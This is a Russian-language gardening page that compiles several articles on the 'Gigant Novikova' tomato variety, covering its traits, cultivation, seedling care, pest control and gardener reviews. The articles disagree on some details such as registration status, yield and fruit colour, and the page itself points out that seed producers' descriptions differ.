1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Томат гигант новикова характеристика и описание сорта

Томат «Гигант Новикова» с отличными вкусовыми качествами

Что имеем на рынке

Выбирая семена, магазины и специализированные центры представляют «Гигант Новикова» от таких производителей:

Всё было бы прекрасно, если бы описание томатов одного и того же сорта не отличались, однако не всё сходится.

Обзор характеристики

Изучая томат «Гигант Новикова» характеристика и описание сорта от разных производителей совершенно не отличается в отношении срока созревания и вегетативной формы. Томаты средние по созреванию и предназначены для выращивания в теплицах и парниках

Описание куста

Растение индетерменантные, высокорослое. Высота побега доходит до двух метров. Листовая пластина среднего размера и сам побег не отличается сильной облиственностью.

Куст требует постоянного пасынкования, но обильного образования пасынков не проявляет.

Каждая кисть несёт на себе 4-5 крупных томатов.

Плоды

Сорт салатного назначения с возможностью переработки на соки, пюре, пасты, кетчупы. Все фирмы подают томат как очень крупноплодный. Величина томата описывается в среднем в пределах 600 г, но «Аэлита» настаивает на 1200 г; «Сибирский сад» утверждает, что томат может достичь 1500 кг веса.

В цветовой гамме производители также не согласовали «Велес утверждает, что томат розового цвета, «Аэлита» и «Семена Крыма» описывает томат как малиновый, «Сибирский сад» говорит о розово-малиновом цвете.

Форма плодов плоско-округлая и в этом все производители сошлись во мнении. Томат крупный с явно выраженной ребристостью и дольчатостью.

Период созревания

Те, кто уже выращивал помидор «Гигант Новикова» рассказывают, что однородности в дозревании плодов нет. Одна томатная кисть может нести на себе очень крупный, начинающий набирать цвет плод, два средних и один очень мелкий, который находится в стадии роста.

Период плодоношения растянутый. Выращивая в теплицах, подрастание томатом затягивается до глубокой осени, и только естественные погодные условия прерывают плодоношение.

Чтобы дать возможность завязаться как можно большему количеству плодов первые томаты, которые уже начали входить в фазу технической спелости целесообразнее убирать.

В середине августа практикуют прищипывание верхушки побега, тогда те томаты, которые уже завязались, успеют набрать вес и дозреть.

Читая отзывы овощеводов, и рассматривая внимательно фото видно, что пересортица имеет место. На фото с обозначением одного и того же сорта томаты с разным габитусом куста, разными плодами, и разным видом в процессе созревания.

Устойчивость к болезням и вредителям

Те, кто запаковал семена, печатая рекомендации по выращиванию утверждают, что томат устойчив против большинства томатных болезней.

Овощеводы, которые выращивали сорт, также делятся позитивными впечатлениями и особой чувствительности к болезням не выявили.

Лёжкость плодов также не велика.

Урожайность

Показатель урожайности определить сложно. Производители указывают цифры от 6 до 10 кг с куста.

Овощеводы, выращивающие сорт менее оптимистичны и указывают на 4-5 кг.

В условиях Подмосковья, овощеводы крайне разочарованы урожайностью и утверждают, что более 4 кг собрать с куста не реально.

Жалуются овощеводы и на то, что сорт очень привередлив и не всякое лето позволит завязать ему хороший урожай.

Достоинства сорта

Те кто любит очень крупные томаты однозначно доволен сортом. Среди его достоинств:

  • крупноплодность;
  • отличные вкусовые качества;
  • урожайность при благополучных обстоятельствах;
  • устойчивость к болезням.

Сорт имеет и ряд недостатков:

  • растрескивание плодов;
  • привередливость к погодным условиям;
  • высокое требование плодородия;
  • низкая лёжкость.

Особенности выращивания

Рассадный период

Сорт томата «Гигант Новикова» требует непременного выращивания рассады со своевременной пикировкой в фазе двух настоящих листьев. Только в таком случае растению удастся нарастить хорошую корневую систему. В этот период важно особенно обратить внимание на:
  • время посева (конец февраля, начало марта, поскольку сорт не ранний);
  • питательность грунтов для рассады (чтобы дать старт мощному нарастанию побегов);
  • индивидуальную ёмкости для выращивания (не менее 500 г, для развития мощного корневища).

Пересадка в грунт

Вырастив мощную рассаду необходимо также позаботиться о высокой питательности грунтов в месте посадки.

Опытные овощеводы вынимают некоторую часть земли с посадочной ямы и обогащают её питательными веществами из расчёта:

На 1 ведро земли

  • 2 ст. ложки аммиачной селитры;
  • 2 ст. ложки суперфосфата;
  • 0,5 л печной золы.

Особое внимание при уходе за крупноплодными томатами нужно уделить формированию побега. Этот томат требует ведения культуры в один ствол.

Образование крупного плода возможно только при постоянной подкормке.

Видео: 10 ошибок при выращивании томатов

Сорт томата Гигант Новикова

Томат Гигант Новикова – один из самых популярных крупноплодных сортов. На юге его выращивают в открытом грунте, в средней полосе – в парниках и под пленкой, на севере – в отапливаемых теплицах. Томат безусловно достоин внимания садоводов и огородников.

Сорт томата Гигант Новикова

Описание

Сорт томата Гигант Новикова относится к индетерминантному типу – куст достигает 250 см и выше.

Помидоры созревают через 110-120 дней после посева. В одной кисти завязывается 4-6 плодов. Плодоношение – постепенное, продолжается до середины осени, а иногда и дольше.

Плоды

Помидоры крупные – от 400 до 900 г, а иногда – больше 1 кг. Их форма – округлая, немного приплюснутая, с хорошо выраженной ребристостью.

Вкус сладкий, с легкой кислинкой. Мякоть сочная и мясистая, с эффектом «арбузной сахаристости». Кожура – тонкая, цвет – розово-малиновый.

Помидоры очень вкусные в свежем виде. Их добавляют в салаты, с ними делают нарезки, а также просто едят в качестве перекусов. Для консервации плоды не подходят из-за большого размера, зато их часто используют для приготовления кетчупов, паст и соков.

Урожайность

Гигант Новикова отличается высокой урожайностью. С одного куста собирают от 5 до 8 кг.

Чтобы получить больше урожая выбирают тепличное выращивание, проводят дополнительные подкормки и формирование в 1 стебель.

Болезни и вредители

Обычно сорта с крупными и сладкими плодами подвержены фитофторе и насекомым-вредителям.

Однако Гигант Новикова обладает высокой устойчивостью и при регулярной профилактике успешно избегает заболеваний.

Потенциальный риск представляют насекомые: совка, колорадский жук, слизни, тля, паутинный клещ. Нужно часто осматривать растения и смывать вредителей мыльным раствором. Более серьезные средства борьбы – инсектициды и акарициды.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Хлопковая совка обычно появляется в середине- конце июня. Это неприметная серо-коричневая бабочка, ведущая ночной образ жизни. Она откладывает яйца на поверхность зеленых томатов. Из них появляются гусеницы, которые «дырявят» плоды и вызывают их загнивание. Для защиты от хлопковой совки в конце июня с интервалом 7-10 дней проводят 2 опрыскивания препаратами инсектицидами.

Достоинства и недостатки

Исходя из характеристики сорта, выделяют такие положительные качества:

  • изумительный вкус;
  • крупноплодность;
  • высокая урожайность;
  • устойчивость к заболеваниям.

Недостатки: плоды склонны к растрескиванию и долго не хранятся.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Для того, чтобы избежать растрескивания плодов, полив их во время созревания (от молочной спелости до побурения плодов) должен быть умеренный и регулярный. Нельзя допускать пересушивания почвы, после которого следует обильный полив.

Посадка

Семена на рассаду высевают в последние дни февраля или в начале марта. При недостатке освещенности досвечивать нужно искусственно. Обычно она готова к пересадке в теплицу уже через два месяца с момента посева.

Посев

Плоды характеризуются отличным вкусом

Подготовка семян включает дезинфекцию раствором марганца и обработку стимулятором роста.

В лоток засыпают слой почвы, удобренной минеральным комплексом, и раскладывают на нем семена (через 1,5-2 см).

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Если используется готовый грунт для посева семян, никакие дополнительные внесения минеральных и органических удобрений не требуются. Грунт полностью готов к применению.

При помощи пульверизатора их увлажняют теплой водой и накрывают вторым слоем почвы толщиною в 1 см.

Лоток закрывают пленкой до появления первых всходов, устанавливают температурный режим 24-25°С.

Рассада

По описанию, всходы появляются через 4-5 дней — с этого момента пленку убирают. Проклюнувшиеся ростки аккуратно поливают теплой водой.

Лоток переносят на подоконник, понижают температуру до 18 °С (на одну неделю). Когда станут явно видны 2 настоящих листа – можно пикировать рассаду в отдельные емкости.

Во время процедуры снова вносят минеральные удобрения в почву.

Пересадка

За две недели до пересадки начинают процесс закаливания: рассаду ежедневно выносят на улицу или балкон, постепенно увеличивая время их прибывания.

Почву в теплице обрабатывают раствором марганца, удобряют, рыхлят. Устанавливают шпалеру, для подвязывания высокорослых кустов. Растения высаживают на расстоянии 60 см друг от друга.

Высокорослые кусты нуждаются в пасынковании и подвязке. Их формируют в 1-2 стебля, удаляя боковые побеги и прищипывая точку роста.

Нижние листья регулярно срезают (по 2-3 штуки за раз), чтобы не загущать и не затенять посадки. Поскольку плоды вырастают очень крупными, подвязывать нужно не только стебли, но и плодовые кисти. (Замечено, что при заломе ветки завязавшимся плодам не удается дозреть.)

Грядку поливают раз в 10 дней строго под корень теплой водой (в жаркое лето чаще – раз в неделю).

Как вариант, можно установить капельный полив.

Во избежание фитофторы и гнилей теплицу нужно регулярно проветривать. После полива почву рыхлят, по мере появления сорняков – пропалывают. Грядки можно мульчировать сухой травой или торфом, что позволит сохранить влагу в грунте и значительно облегчит уход.

Подкормки

Высокорослые сорта с крупными плодами очень любят подкормки. Делать их нужно каждые 2 недели. Органические удобрения лучше чередовать с минеральными комплексами: первые обеспечивают плодородность почвы, а вторые питают корневую систему.

Описание томата Гигант Новикова

Каждый огородник имеет разные вкусы: одни любят сладкие помидоры, а другие с кислинкой. Кто-то отдает свое предпочтение крупным томатам с розовой кожурой и невероятным вкусом. Именно такой характеристикой наделены томаты Гигант Новикова. Кроме этого, помидоры стойкие ко многим заболеваниям, поэтому выращивать этот сорт будет одно удовольствие.

Описание томата Гигант Новикова

Характеристика томата

Томат Гигант Новикова был выведен селекционерами еще в СССР. Официально его зарегистрировали в 1990 г. Его можно выращивать как в открытой почве, так и в парниках. Он получил популярность из-за высокой урожайности и качественных плодов. На сегодняшний день сорт томатов Гигант Новикова лидирует среди других видов и часто выращивается огородниками.

Томаты такого вида рекомендовано выращивать на свежем воздухе в южных областях. Если участок находится в средней полосе, то помидоры выращивают под пленкой. Для северных регионов подойдет метод выращивания в теплицах. Но, как показывает практика, на качество и количество урожая методы выращивания не сильно сказываются. Сорт Гигант Новикова – среднеспелый, вегетационный период длится 110-120 дней.

Описание растения

Описание куста Томат Гигант Новикова имеет следующее: куст поднимается до 2 м в высоту. Стебли тонкие с зелеными волокнистыми листочками. Чтобы растение не обламывало стебли, его рекомендовано подвязывать, и устанавливать подпорки.

Куст формируют в 2-3 стебля. Овощи нормально развиваются, как на открытой местности, так и в парниках.

Описание плодов

Томаты достаточно крупные, вес одного плода составляет 500-900 г. Томат Гигант Новикова описание сорта – созревшие плоды имеют розовый цвет. Форма круглая, немного приплюснутая с небольшой ребристостью. Помидоры многокамерные, всегда достигают крупных размеров.

Вкус помидоров приятный, сахаристый и сочный. Их консервируют на зиму, едят свежими и засаливают в бочках. Прекрасно гармонируют в блюдах с другими продуктами. Плоды подходят для приготовления паст, соусов и соков. Но, к сожалению, томаты хранить долго нельзя, они имеют свойства быстро портится, поэтому желательно их использовать как можно быстрей.

Кроме этого, сорт Гигант Новикова содержит много витаминов. Он включает в себя следующие вещества:

  • сухие вещества – 5,5-6,0%;
  • сахар – 3,-36-3,56%;
  • кислотность – 0,48-0,52%;
  • витамин С – 23,8-29,29 мг.

Плюсы и минусы сорта

Огородники выделают много положительных качеств сорта, к ним можно отнести такие:

  • отменные вкусовые качества;
  • крупные плоды;
  • большое содержание полезных веществ;
  • крепкий иммунитет ко многим болезням;
  • хорошо относится к сильной засухе;
  • возможность транспортировки без повреждений.

К недостаткам можно отнести быстрое разрушение продукта и требования к подкормкам грунта, на котором выращивается овощ.

Посадка томатов

Томат можно выращивать в парнике и на открытом грунте

Помидоры сорта Гигант Новикова можно культивировать на открытом воздухе, под пленочным покрытием и в парниках. К основным правилам высадки огородники относят такие:

  • рассаду начинают подготавливать в марте – для этого в специальные овощные ящики сеют семена помидор;
  • рассаживать рассаду начинают тогда, когда на растении появится 1-2 листочка;
  • если огородник будет выращивать томаты под пленкой, тогда посадку лучше провести в середине мая, если это открытый грунт – первые числа июня: в возрасте 60-65 дней на кусте растения появляются первые листья;
  • схема высадки должна выглядеть так: 0,6х0,5 м;
  • обязательно растение подвязывают и формируют куст.

Уход за растением

Вид томатов Гигант Новикова любит подкормки, поэтому ему стоит уделить внимание в период созревания. Именно удобрения смогут повысить урожайность и качество томатов. Если огородник выращивает помидоры в теплице, ему необходимо открывать парник на несколько часов в момент хорошей погоды, а на 1 час, когда присутствует ветер. С каждым днем необходимо понемногу увеличить количество часов и давать растению дышать свежим воздухом.

Обязательно растению проводят профилактические мероприятия, чтобы избежать возможных заболеваний. Для этого применяют раствор медного купороса 5% и марганцовку. Медный купорос начинают использовать за неделю до высадки, раствором опрыскивают весь участок посадки. Раствор марганцовки добавляют в сами лунки также перед посадкой. Для этого берут 2 г вещества и разводят его в 10 л воды.

Чтобы укрепить растению корни, проводят не только закаливание и профилактику, но и укореняют нижние побеги. Огородники с хорошим опытом рекомендуют применять для посадки на открытые участки рассаду закаленную. Также стоит знать, что помидор Гигант Новикова нуждается в подкормках, его подкармливают 4 раза на протяжении всего вегетационного периода. Сначала удобряют саму рассаду, 2 раза на следующий день после посадки, а потом спустя 2 недели.

Подкормки желательно проводить одновременно с поливами и небольшим рыхлением участка. Каждый огородник должен знать, что томаты этого сорта нормально относятся к засухе, но не стоит забывать про своевременные поливы. Вторую подкормку вносят, когда появляются зеленые плоды. Третью через 2-3 недели после второй. Для подкормок берут готовые комплексные минералы. Для подросшего растения подбирают удобрения, в состав которых не входит мочевина.

Заболевания и вредители

Сорт Гигант Новикова обладает крепким иммунитетом ко многим заболеваниям. Но каждому огороднику нужно быть внимательным во время ухода, поскольку болезни появляются от неправильного ухода во время выращивания. Чтобы этого не произошло, в период выращивания овощей в теплицах и под пленками проводят проветривание, а также соблюдают режим полива и освещения.

Растение может подхватить корневую гниль, чтобы этого избежать, проводят рыхление почвы и уменьшают количество поливов. Землю вокруг кустов отгребают и насыпают смесь торфа, песка и мелких опилок. Из вида вредителей часто замечают картофельных совкой, против них также помогает рыхление, удаление травмированных и нездоровых плодов и стеблей.

На Юге страны может появиться колорадский жук. Для борьбы с этим насекомым применяют химическое средство Престиж. В теплицах, в основном, может жить бахчевая тля и паутинный клещ. Для их уничтожения применяют средство Зубр. Также, как и остальные виды помидор, Гигант Новикова испытывает слабость к появлению слизней. Таких насекомых необходимо собирать руками, а возле кустов присыпать почву песком и известью.

Заключение

Такой вид помидор под силу вырастить огородникам с опытом, дачники любители могут не справиться с условиями выращивания. Но не нужно сразу отказываться от овощей, каждый может попробовать их вырастить. При соблюдении всех правил культивирования и ухода, можно собрать большой и качественный урожай, ведь урожайность зависит напрямую от способа выращивания и ухода.

Устойчивый к заболеваниям и вредителям сорт томата «Гигант Новикова»

Сегодня речь пойдет не о новинке, а о проверенном сорте — Гигант Новикова. Этот томат широко известен по всей стране, так как существует более 30 лет. Он не утратил актуальности среди огородников и продолжает занимать лидирующие позиции в теплицах и на открытых грядках. Познакомимся с его достоинствами подробнее.

Характеристика и описание сорта

Сорт Гигант Новикова включен в Госреестр в 1990 году. Его разработкой занимались отечественные селекционеры. Культура рекомендована для разведения в открытом грунте и защищенных конструкциях.

Отличительные черты

Тип куста индетерминантный, высота достигает 2,5 м. Густооблиственный, листья мелкие, изумрудного оттенка. Растение требует обязательного пасынкования, хотя растут пасынки неактивно.

Каждая кисть завязывает 4–6 крупных плодов. Чтобы ветви не ломались от их тяжести, устанавливают дополнительную опору.

Сроки созревания средние, с момента посева до сбора плодов проходит 110–120 дней. Томат образует завязи при любом климате.

Урожайность высокая, с одного саженца собирают 5–7 кг при условии размещения не более 3 растений на 1 кв. м. Плодоношение растянутое, продолжается до середины осени, а при хорошей погоде — до первых заморозков.

Помидоры устойчивы к заболеваниям, характерным для томатного ряда. Культура хорошо противостоит фитофторе, вирусу табачной мозаики, фузариозу и гнилям.

Справка. У крупноплодных видов в основном нет иммунитета к заболеваниям.

Характеристики плодов

Плоды крупные, средний вес — 400–800 г. Форма округлая, приплюснутая сверху, с выраженной ребристостью. Цвет от малинового до ярко-красного. Вкус сахаристый с едва заметной кислинкой. Мякоть сочная и мясистая, во вкусе улавливаются арбузные нотки. Кожура тонкая.

Спелые овощи не подходят для консервации из-за большого размера. Их пускают в переработку на томатную продукцию и готовят разнообразные блюда из свежих томатов.

Спелые томаты могут растрескиваться, поэтому долго хранить их не получится. Также они не выдерживают длительных транспортировок. При перевозке на близкие расстояния их укладывают не более чем в 2 ряда.

Справка. У томата Гигант Новикова несколько производителей, поэтому вкусовые качества и цвет спелых овощей могут незначительно отличаться друг от друга. Условия выращивания у всех производителей одинаковые.

На фото представлены помидоры Гигант Новикова.

Как вырастить рассаду

Семена на рассаду сеют за 2 месяца до высадки в грунт. Предварительно их подготавливают для улучшения иммунитета и процента всхожести.

Подготовка семян

Семенной материал можно собрать самостоятельно с крупных и здоровых плодов. Но в таком случае следует уделить особое внимание подготовке к посеву:

  1. Отбраковка. Зерна раскладывают на столе по одному и тщательно осматривают на наличие видимых повреждений. Здоровые экземпляры должны быть светлого цвета и без искривлений.
  2. Проверка на наполнение. 1 чайную ложку соли растворяют в стакане воды и выдерживают зерна в растворе в течение 10 минут. Пустые семена всплывут на поверхность. Они не взойдут, поэтому их сразу утилизируют.
  3. Дезинфекция. 1 г марганца растворяют в 0,5 стакана воды, получая слабый (розовый) раствор. В нем зерна выдерживают 20–25 минут, затем промывают проточной водой.
  4. Обработка стимулятором роста для повышения всхожести. Семена замачивают на 10 часов.

Справка. Раствор марганцовки обязательно должен быть слабым, иначе высокая концентрация загубит весь посевной материал.

Емкость и почва

Почву для высокорослых томатов готовят из садовой земли, перегноя, торфа и речного песка. Все компоненты берут в одинаковых пропорциях и тщательно перемешивают. Для плодородности добавляют суперфосфат или полный комплекс минералов.

Готовый грунт проливают горячим раствором марганца темного цвета для уничтожения патогенной флоры. В земле немало болезнетворных спор, способных нанести сеянцам большой вред. После того как грунт остынет, его раскладывают в посадочные емкости.

Сажают в общий деревянный ящик или отдельную тару — бумажные соты, пластиковые стаканчики и торфяные горшочки. Предварительно емкости обрабатывают раствором марганца и на дне каждой делают дренажные отверстия, куда будет стекать лишняя вода. Без дренажа при застое влаги молодые корешки могут загнить. К тому же при повышенной влажности вероятен риск возникновения грибковых инфекций.

О других гигантах для вашего огорода:

Посев

В почве делают бороздки 2 см глубиной, в которые закладывают семена. После бороздки присыпают землей, уплотняют и поливают теплой отстоянной водой из пульверизатора. Для создания парникового эффекта емкости накрывают пленкой или стеклом и оставляют в помещении при температуре 24–26 °С.

Уход за рассадой

При появлении всходов пленку убирают, переставляя емкости на подоконник. В первую неделю температуру снижают до 16 °С. Через неделю ее повышают до 22 °С.

Длительность светового дня составляет не менее 12 часов. При нехватке естественного освещения устанавливают фитолампы.

Справка. При недостаточном освещении рассада заметно отстает в развитии.

В рассадный период необходим умеренный полив только теплой отстоянной водой из мелкой лейки. После полива землю аккуратно рыхлят.

При образовании двух настоящих листиков рассаду пикируют, рассаживая по отдельным емкостям. Перед процедурой почву хорошо увлажняют и пересаживают вместе с комом земли. Ту землю, в которую делают пересадку, удобряют полным комплексом минералов.

За 2 недели до пересадки рассаду закаливают на открытом воздухе. В первый день время пребывания на улице составляет не более 1 часа, температура при этом — не ниже 16 °С. Постепенно интервал времени увеличивают до 11 часов.

Как выращивать помидоры

Пересадку осуществляют, когда почва прогреется до 15 °С. В холодной земле молодые кустики долго не будут расти, к тому же корневая система в холоде может загнить.

Посадка

Грядки под томаты выбирают в солнечном месте, защищенном от сквозных ветров. Если посадку планируют в теплицу, землю предварительно проливают медным купоросом для уничтожения грибковых спор.

Почву перекапывают, вносят комплекс минералов и делают лунки не глубже 20 см. На дно каждой кладут немного древесной золы и заливают теплой водой. На 1 кв. м размещают 2-3 саженца на расстоянии 60 см друг от друга. При высаживании в шахматном порядке растения не будут затенять друг друга и смогут проветриваться.

Дальнейший уход

Регулярный полив устанавливают по мере укоренения саженцев на новом месте. Поливают 1 раз в 10 дней, в жаркие дни — 1 раз в неделю. Для задержания влаги грядки мульчируют торфом, соломой или опилками. Это особенно важно в засушливые дни, когда наблюдается сильное испарение.

Культура хорошо откликается на капельный полив. Для этого в прикорневой зоне устанавливают пластиковую бутылку без дна и заливают ее водой, которая из бутылки постепенно проникает к корням. После полива землю рыхлят и удаляют сорную траву с корнями.

Справка. Капельный полив удобно применять в теплице. При такой системе орошения не повышается уровень влажности.

Высокорослые саженцы требуют частой подкормки полным комплексом минеральных веществ. Подкармливают 1 раз в 2 недели, чередуя внесение минералов с органическими соединениями. Из органики используют настой коровяка в соотношении 1:10. Она обеспечивает плодородность почвы, а минералы питают корневую систему.

Справка. Свежим навозом томаты удобрять не рекомендуется, так как после такой подкормки усиленно наращивается зеленая масса.

Особенности выращивания и возможные трудности

Для подвязки саженцев заранее делают шпалеры. С разных сторон грядки устанавливают металлические опоры и между ними протягивают горизонтально проволоку. К ней фиксируют стебель и плодоносные ветви с тяжелыми плодами. Подвязка на шпалеру — самый удобный вариант фиксации высокорослых растений, так саженцы совершенно не травмируются.

Для получения максимальной отдачи куст формируют в 1 или 2 стебля. Все остальные пасынки удаляют. Боковых побегов немного, но если их не удалять, они загущают посадки. Нижние листья удаляют до первой плодоносной ветви, так как при контакте с влажными грядками они загниют, что приведет к развитию инфекций.

Болезни и вредители

Культура зарекомендовала себя как высокоустойчивая к заболеваниям семейства пасленовых. Поэтому после проведения профилактики саженцы не болеют на протяжении всего периода вегетации. К ней относятся умеренный полив, систематическое рыхление, мульчирование грядок и обработка растений фунгицидными средствами, например, «Фитоспорином» . Он, кроме прочего, улучшает иммунитет растений.

К вредителям томат менее устойчив. Он страдает от атак колорадского жука, совки, тли и слизней. Против тли и слизней применяют мыльный раствор, которым обрабатывают стебли саженцев. Колорадского жука собирают вручную вместе с его личинками, которые самка откладывает с обратной стороны листа. Поэтому важно осматривать саженцы тщательно и со всех сторон. В борьбе с совкой помогает отвар полыни: в 3 литрах воды кипятят 1 кг полыни. Применяют дважды с интервалом в 1 неделю.

При разведении томата в теплице ее проветривают каждый день, чтобы уровень влажности и температуры не превышал норму.

Нюансы для открытого грунта и тепличных условий

Так как растения высокие, макушку прищипывают, чтобы они не расходовали полезные вещества на рост. Таким образом все силы идут на формирующиеся завязи, благодаря чему получаются крупные плоды.

При высаживании рассады в грунт через 2,5–3 месяца первые овощи собирают уже через месяц. Причем переросшая рассада отлично приживается в грунте, сохраняя урожайность и вкусовые качества плодов.

В южных районах томат прекрасно растет и плодоносит в открытом грунте. В средней полосе его лучше выращивать под пленочным укрытием. В условиях Урала и Сибири культуру высаживают только в тепличные условия. Несмотря на условия произрастания, томаты плодоносят одинаково. Вкус также в любом случае сохраняется.

Сбор и применение урожая

Благодаря растянутому плодоношению спелые овощи собирают до первых заморозков. Причем последние ничем не отличаются от первых, они такие же вкусные и большие.

Применение овощей универсальное: в свежем виде их используют для приготовления салатов, гарниров, горячих блюд, для пиццы и различных закусок. При переработке на томатную продукцию из помидоров получают соки, пасту, кетчупы, аджику и соусы.

Из-за сочной мякоти и тонкой кожуры томаты долго не хранятся и не выдерживают длительных перевозок.

Преимущества и недостатки

По характеристике и отзывам крупноплодный вид имеет много преимуществ:

  • приживается во всех регионах;
  • образует завязи при любой погоде;
  • несложная агротехника;
  • высокий показатель плодоношения;
  • устойчив к заболеваниям;
  • отменный вкус;
  • крупные плоды;
  • универсальное применение.

К отрицательным качествам относят необходимость пасынкования, подвязки и формирования саженцев.

Отзывы фермеров

В большинстве своем отзывы о томате положительные. Огородники утверждают, что плоды на фотографиях не имеют различий с теми, что вырастают на грядках.

Ангелина, г. Тверь: «Выращиваю томат не первый сезон. Хочется отметить, что несмотря на высокорослость, ухаживать за ним несложно. Очень нравится вкус, сладкий, с характерной кислинкой. Собираю по целому ведру овощей за 1 день».

Валентина, г. Абакан: «Впервые высадила томат в проветриваемую теплицу. Вначале саженцы росли не слишком быстро, но плодоносили прекрасно, а к концу сезона выросли более 1,8 м. На верхних ярусах плоды формировались мельче, чем снизу, но вкус сохраняли. Собранный урожай резали в салаты, добавляли в гарниры — вкус превосходный».

Заключение

Томат Гигант Новикова полностью оправдывает свое название — плоды вырастают весом до 1 кг. Это один из самых крупноплодных российских сортов. Он высокоустойчив к заболеваниям и дает отличные показатели плодоношения. Культура знаменита среди огородников на протяжении долгого времени и по-прежнему любима многими садоводами.

Томат «Гигант Новикова»: описание сорта, фото и отзывы

Приобретая посевной материал, овощеводы могут выбирать самые современные разновидности помидоров. Несмотря на это, многие дачники до сих пор хранят верность «любительским» сортам, впервые появившимся на отечественных огородах в последние десятилетия XX века. По качеству плодов некоторые из таких растений не уступают сортам и гибридам, выведенным профессиональными селекционерами. Наша статья посвящена характеристикам томата «Гигант Новикова» – любимца нескольких поколений российских дачников.

Основные параметры и особенности сорта представлены в таблице:

Параметр Характеристика
Культура Томат
Срок созревания Среднеспелый
Период от всходов до плодоношения 110-120 дней
Продолжительность плодоношения Растянутое
Товарная урожайность В среднем 4 кг с растения (максимально – до 6-9 кг)
Количество плодов на кисти 4-5
Масса плода 500-600 г (максимально до 1,0-1,3 кг)
Форма Плоскоокруглая с выраженной ребристостью
Окраска плодов Насыщенно-малиновая
Кожица Тонкая, склонная к растрескиванию
Мякоть Сахаристая, сочная, ароматная
Вкусовые качества Отличные
Транспортабельность и лежкость Низкие
Назначение Салатное, консервное (для переработки на соки и соусы)
Тип растения Индетерминантное, высокорослое (до 200 см)
Активность образования боковых побегов Средняя
Особенности выращивания Требует подвязки и формирования растений (оптимальным считается ведение в 1 ствол), чувствителен к плодородию почвы (нуждается в подкормках)
Устойчивость к заболеваниям Сорт сравнительно слабо поражается болезнями, часто повреждается насекомыми-вредителями
Рекомендуемые регионы выращивания В открытом или защищенном грунте (в зависимости от климатических условий региона)
Регистрация в ФГБУ «Госсорткомиссия» Не включен

Биологические особенности и специфика возделывания сорта

Томат «народной селекции». Широко распространен, но в Государственном реестре РФ не зарегистрирован. Семена реализуют агрофирмы «Аэлита», «Сибирский сад», «Велес» и другие.

К сожалению, в описаниях, вынесенных производителями на упаковки, имеются противоречия, касающиеся урожайности, а также окраски и максимального веса плодов. При оценке этих параметров есть смысл полагаться исключительно на информацию тех, кто сажал данный помидор.

Лабораторную проверку качества семян производителя «Артикул» можно посмотреть в следующем видео:

Сорт предназначен для выращивания в открытом и защищенном грунте (в зависимости от климатических условий). Растения индетерминантные, высокорослые (до 200 см и более).

Активность образования боковых побегов оценивается овощеводами как средняя. Тем не менее, оптимальным способом возделывания считается выращивание с формированием куста в один ствол.

Сорт характеризуется растянутым периодом плодоношения, поэтому можно не торопиться с прищипыванием стеблей (если рассада высажена на грядку или в достаточно высокую теплицу), чтобы дать растениям возможность образовывать завязи как можно дольше. Кусты нуждаются в подвязывании к опорам. Кроме того, необходимо удалять все листья, растущие ниже первой цветочной кисти, чтобы снизить вероятность поражения заболеваниями.

По данным овощеводов, томат обладает высокой чувствительностью к минеральному составу почвы. В течение вегетационного периода растения нужно подкармливать не менее 3 раз. Болезнями сорт поражается сравнительно слабо, но кусты нередко повреждаются гусеницами совки, белокрылки и других насекомых.

Срок созревания плодов средний – 110-120 дней от появления полных всходов. На каждой кисти формируется по 4-5 помидоров весом в среднем 500-600 г.

Некоторые дачники сообщают, что при нормировании количества завязей удается вырастить экземпляры массой от 1000 до 1300 г.

Плоды имеют плоскоокруглую форму с выраженной ребристостью и насыщенную малиновую окраску. Шкурка у томатов не очень прочная, склонная к растрескиванию. Мякоть сахаристая, сочная, ароматная, прекрасного вкуса. Плоды отлично подходят для летних салатов, переработки на соки и соусы, но в спелом виде почти не хранятся и не годятся для транспортировки.

Производители семян обещают урожайность сорта от 6 до 9 кг с растения. Опыт огородников свидетельствует о том, что этот параметр даже при хороших погодных условиях и грамотной агротехнике не превышает 4 кг.

Отзывы дачников

В прошлом году купила семена от «Аэлиты», соблазнившись фото томата Гигант Новикова и отзывами старожилов дачных форумов. Теперь этот сорт – мой любимец. Плоды крупные (у меня были почти все по 500 г или чуть больше), красоты необыкновенной. Вкус прекрасный: настоящий помидор «из детства». Недостаток только один: использовать надо сразу, как поспеют. Мы ели свежими и закатывали сок (тоже очень вкусный).

Андрей, 42 года, г. Пермь

У меня этот сорт живет много лет, и отказываться от него не собираюсь. Такие вкусные помидоры редко встретишь. Выращивать довольно просто. Рассаду высаживаю в теплицу, по 3 куста на квадратный метр. Пасынкую радикально: оставляю только главный стебель. Прищипываю в середине августа. В принципе, завязи могут формироваться и в сентябре, но так лучше наливаются нижние кисти. Если оставлять не больше 2 завязей на кисти, помидоры вырастают по 700-800 г. Только срывать лучше «бурыми»: спелые часто растрескиваются.

Наталья, 29 лет, г. Волгоград

По вкусу томат один из лучших. В ОГ прекрасно растет, не болеет, плодоносит до конца сентября. Помидоры сочные, ароматные, сладкие. Из них получаются отличные соусы. Урожайность не самая высокая, но стабильная. Очень удачный, надежный сорт.

Игорь, 51 год, Московская область

Из крупноплодных малиновых сортов, на мой взгляд, лучший. Несколько лет выращиваю в теплице. Первые семена были от «Сибирского сада». Кусты веду в один стебель, удаляю нижние листья, но завязи не нормирую. Подкармливаю регулярно, иначе плоды мельчают. Других проблем не было. Сорт не из ранних, но болезнями практически не поражается. Заметил интересную особенность: в отличие от других «гигантов», у этого томата крупные плоды вырастают практически на всех кистях, а не только на нижних. У меня самые мелкие получались по 400 г. Правда, наливаются все в разное время; плодоношение сильно растянуто. И снимать лучше не совсем спелыми, чтобы не потрескались.

Купила в прошлом году семена «Гиганта Новикова» от фирмы «Велес» и столкнулась с пересортицей. Из 10 сеянцев 3 оказались с «картофельным» листом. Не знаю, какой это был томат: у меня места немного, не стала их высаживать. Остальные кусты, вроде бы, соответствовали описанию сорта, но помидоры получились не малиновые, а красные. Крупные были (по 300-400 г), но на вкус показались кисловатыми и водянистыми. В общем, я разочаровалась. Если и буду сажать этот «гигант» (его уж очень хвалят), то постараюсь семена взять у знакомых.

Валентина, 55 лет, г. Клин

